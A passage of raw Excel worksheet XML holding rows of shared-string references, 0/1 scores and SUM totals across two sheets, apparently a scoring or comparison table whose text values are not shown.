      <c r="C20" s="3" t="s">
        <v>817</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>817</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>818</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>819</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>819</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>819</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>0</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>38</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>809</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>172</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>172</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>172</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>811</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>174</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>179</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>174</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>820</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>821</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>821</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>821</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>114</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>711</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>822</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>823</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>823</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>832</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1922</v>
      </c>
      <c r="D29">
        <v>0</v>
      </c>
      <c r="E29">
        <v>0</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>38</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>809</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>172</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>172</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>172</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>811</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>174</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>179</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>174</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>820</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>821</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>821</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>821</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>824</v>
      </c>
      <c r="B34" s="3"/>
      <c r="C34" s="3"/>
      <c r="F34" s="3"/>
    </row>
    <row r="35" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>825</v>
      </c>
      <c r="B35" s="3"/>
      <c r="C35" s="3"/>
      <c r="F35" s="3"/>
    </row>
    <row r="36" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>826</v>
      </c>
      <c r="B36" s="3"/>
      <c r="C36" s="3"/>
      <c r="F36" s="3"/>
    </row>
    <row r="37" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A37" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D37" s="6">
        <f>SUM(D4:D34)</f>
        <v>28</v>
      </c>
      <c r="E37" s="6">
        <f t="shared" ref="E37:H37" si="0">SUM(E4:E34)</f>
        <v>24</v>
      </c>
      <c r="F37" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G37" s="6">
        <f t="shared" si="0"/>
        <v>29</v>
      </c>
      <c r="H37" s="6">
        <f t="shared" si="0"/>
        <v>24</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A40" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B40" s="25"/>
      <c r="C40" s="25"/>
      <c r="D40" s="25"/>
      <c r="E40" s="25"/>
      <c r="F40" s="25"/>
      <c r="G40" s="25"/>
      <c r="H40" s="25"/>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B41" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C41" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D41" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E41" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F41" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G41" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H41" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1592</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>0</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1548</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A46" s="3"/>
      <c r="B46" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>61</v>
      </c>
      <c r="D46" s="19">
        <v>1</v>
      </c>
      <c r="E46" s="19">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>61</v>
      </c>
      <c r="G46" s="19">
        <v>1</v>
      </c>
      <c r="H46" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>48</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D47">
        <v>1</v>
      </c>
      <c r="E47">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A48" s="3"/>
      <c r="B48" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>63</v>
      </c>
      <c r="D48" s="19">
        <v>1</v>
      </c>
      <c r="E48" s="19">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>63</v>
      </c>
      <c r="G48" s="19">
        <v>1</v>
      </c>
      <c r="H48" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>1710</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1746</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1752</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>0</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1751</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A50" s="3"/>
      <c r="B50" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="D50" s="19">
        <v>1</v>
      </c>
      <c r="E50" s="19">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="G50" s="19">
        <v>1</v>
      </c>
      <c r="H50" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>1711</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1747</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1747</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1747</v>
      </c>
      <c r="G51">
        <v>1</v>
      </c>
      <c r="H51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A52" s="3"/>
      <c r="B52" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="C52" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="D52" s="19">
        <v>1</v>
      </c>
      <c r="E52" s="19">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="G52" s="19">
        <v>1</v>
      </c>
      <c r="H52" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>1712</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1748</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1753</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>0</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1748</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1713</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1714</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1714</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1739</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1472</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1473</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>1473</v>
      </c>
      <c r="D55">
        <v>1</v>
      </c>
      <c r="E55">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1509</v>
      </c>
      <c r="G55">
        <v>1</v>
      </c>
      <c r="H55">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1715</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1716</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1716</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1740</v>
      </c>
      <c r="G56">
        <v>1</v>
      </c>
      <c r="H56">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1718</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1719</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1719</v>
      </c>
      <c r="D57">
        <v>1</v>
      </c>
      <c r="E57">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>1741</v>
      </c>
      <c r="G57">
        <v>1</v>
      </c>
      <c r="H57">
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A58" s="3" t="s">
        <v>1720</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>1721</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>1722</v>
      </c>
      <c r="D58">
        <v>1</v>
      </c>
      <c r="E58">
        <v>0</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>1742</v>
      </c>
      <c r="G58">
        <v>1</v>
      </c>
      <c r="H58">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="3" t="s">
        <v>1723</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="D59">
        <v>1</v>
      </c>
      <c r="E59">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="G59">
        <v>1</v>
      </c>
      <c r="H59">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A60" s="3"/>
      <c r="B60" s="3" t="s">
        <v>1750</v>
      </c>
      <c r="C60" s="3"/>
      <c r="D60" s="19">
        <v>0</v>
      </c>
      <c r="E60" s="19">
        <v>0</v>
      </c>
      <c r="F60" s="3"/>
      <c r="G60" s="19">
        <v>0</v>
      </c>
      <c r="H60" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>1724</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1749</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1725</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1743</v>
      </c>
      <c r="G61">
        <v>1</v>
      </c>
      <c r="H61">
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>1726</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1716</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>1717</v>
      </c>
      <c r="D62">
        <v>1</v>
      </c>
      <c r="E62">
        <v>0</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>1740</v>
      </c>
      <c r="G62">
        <v>1</v>
      </c>
      <c r="H62">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>1478</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="D63">
        <v>1</v>
      </c>
      <c r="E63">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="G63">
        <v>1</v>
      </c>
      <c r="H63">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>1727</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>1460</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>1460</v>
      </c>
      <c r="D64">
        <v>1</v>
      </c>
      <c r="E64">
        <v>1</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>1460</v>
      </c>
      <c r="G64">
        <v>1</v>
      </c>
      <c r="H64">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>1728</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1729</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>1730</v>
      </c>
      <c r="D65">
        <v>1</v>
      </c>
      <c r="E65">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>1730</v>
      </c>
      <c r="G65">
        <v>1</v>
      </c>
      <c r="H65">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>1731</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>1732</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>1128</v>
      </c>
      <c r="D66">
        <v>1</v>
      </c>
      <c r="E66">
        <v>1</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>1309</v>
      </c>
      <c r="G66">
        <v>1</v>
      </c>
      <c r="H66">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>1733</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>1721</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>1923</v>
      </c>
      <c r="D67">
        <v>0</v>
      </c>
      <c r="E67">
        <v>0</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>1923</v>
      </c>
      <c r="G67">
        <v>0</v>
      </c>
      <c r="H67">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A68" s="3" t="s">
        <v>1734</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>1716</v>
      </c>
      <c r="C68" s="9" t="s">
        <v>1924</v>
      </c>
      <c r="D68">
        <v>0</v>
      </c>
      <c r="E68">
        <v>0</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>1740</v>
      </c>
      <c r="G68">
        <v>1</v>
      </c>
      <c r="H68">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A69" s="3" t="s">
        <v>1478</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1754</v>
      </c>
      <c r="D69">
        <v>1</v>
      </c>
      <c r="E69">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1754</v>
      </c>
      <c r="G69">
        <v>1</v>
      </c>
      <c r="H69">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A70" s="3"/>
      <c r="B70" s="3" t="s">
        <v>69</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>1755</v>
      </c>
      <c r="D70" s="19">
        <v>1</v>
      </c>
      <c r="E70" s="19">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>69</v>
      </c>
      <c r="G70" s="19">
        <v>1</v>
      </c>
      <c r="H70" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A71" s="3" t="s">
        <v>1735</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="D71">
        <v>1</v>
      </c>
      <c r="E71">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="G71">
        <v>1</v>
      </c>
      <c r="H71">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>1573</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>1055</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="D72">
        <v>1</v>
      </c>
      <c r="E72">
        <v>1</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="G72">
        <v>1</v>
      </c>
      <c r="H72">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A73" s="3" t="s">
        <v>1056</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D73">
        <v>1</v>
      </c>
      <c r="E73">
        <v>1</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>73</v>
      </c>
      <c r="G73">
        <v>1</v>
      </c>
      <c r="H73">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="96.6" x14ac:dyDescent="0.25">
      <c r="A74" s="3" t="s">
        <v>1736</v>
      </c>
      <c r="B74" s="3" t="s">
        <v>1737</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>1738</v>
      </c>
      <c r="D74">
        <v>1</v>
      </c>
      <c r="E74">
        <v>1</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>1745</v>
      </c>
      <c r="G74">
        <v>1</v>
      </c>
      <c r="H74">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A75" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D75" s="6">
        <f>SUM(D42:D74)</f>
        <v>30</v>
      </c>
      <c r="E75" s="6">
        <f t="shared" ref="E75:H75" si="1">SUM(E42:E74)</f>
        <v>25</v>
      </c>
      <c r="F75" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G75" s="6">
        <f t="shared" si="1"/>
        <v>31</v>
      </c>
      <c r="H75" s="6">
        <f t="shared" si="1"/>
        <v>26</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A40:H40"/>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2D06B-4B71-4C47-8AE5-6FCFA686F531}">
  <dimension ref="A1:H38"/>
  <sheetViews>
    <sheetView topLeftCell="A28" workbookViewId="0">
      <selection activeCell="J34" sqref="J34"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.5546875" customWidth="1"/>
    <col min="2" max="2" width="26.77734375" customWidth="1"/>
    <col min="3" max="3" width="26.6640625" customWidth="1"/>
    <col min="4" max="4" width="10.21875" customWidth="1"/>
    <col min="5" max="5" width="10" customWidth="1"/>
    <col min="6" max="6" width="26.77734375" customWidth="1"/>
    <col min="7" max="7" width="11" customWidth="1"/>
    <col min="8" max="8" width="9.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="30" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>833</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ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>834</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>835</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>835</v>
      </c>
      <c r="D4" s="20">
        <v>1</v>
      </c>
      <c r="E4" s="20">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>835</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>836</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>837</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>837</v>
      </c>
      <c r="D5" s="20">
        <v>1</v>
      </c>
      <c r="E5" s="20">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>837</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>838</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>839</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>839</v>
      </c>
      <c r="D6" s="20">
        <v>1</v>
      </c>
      <c r="E6" s="20">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>839</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>802</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D7" s="20">
        <v>1</v>
      </c>
      <c r="E7" s="20">
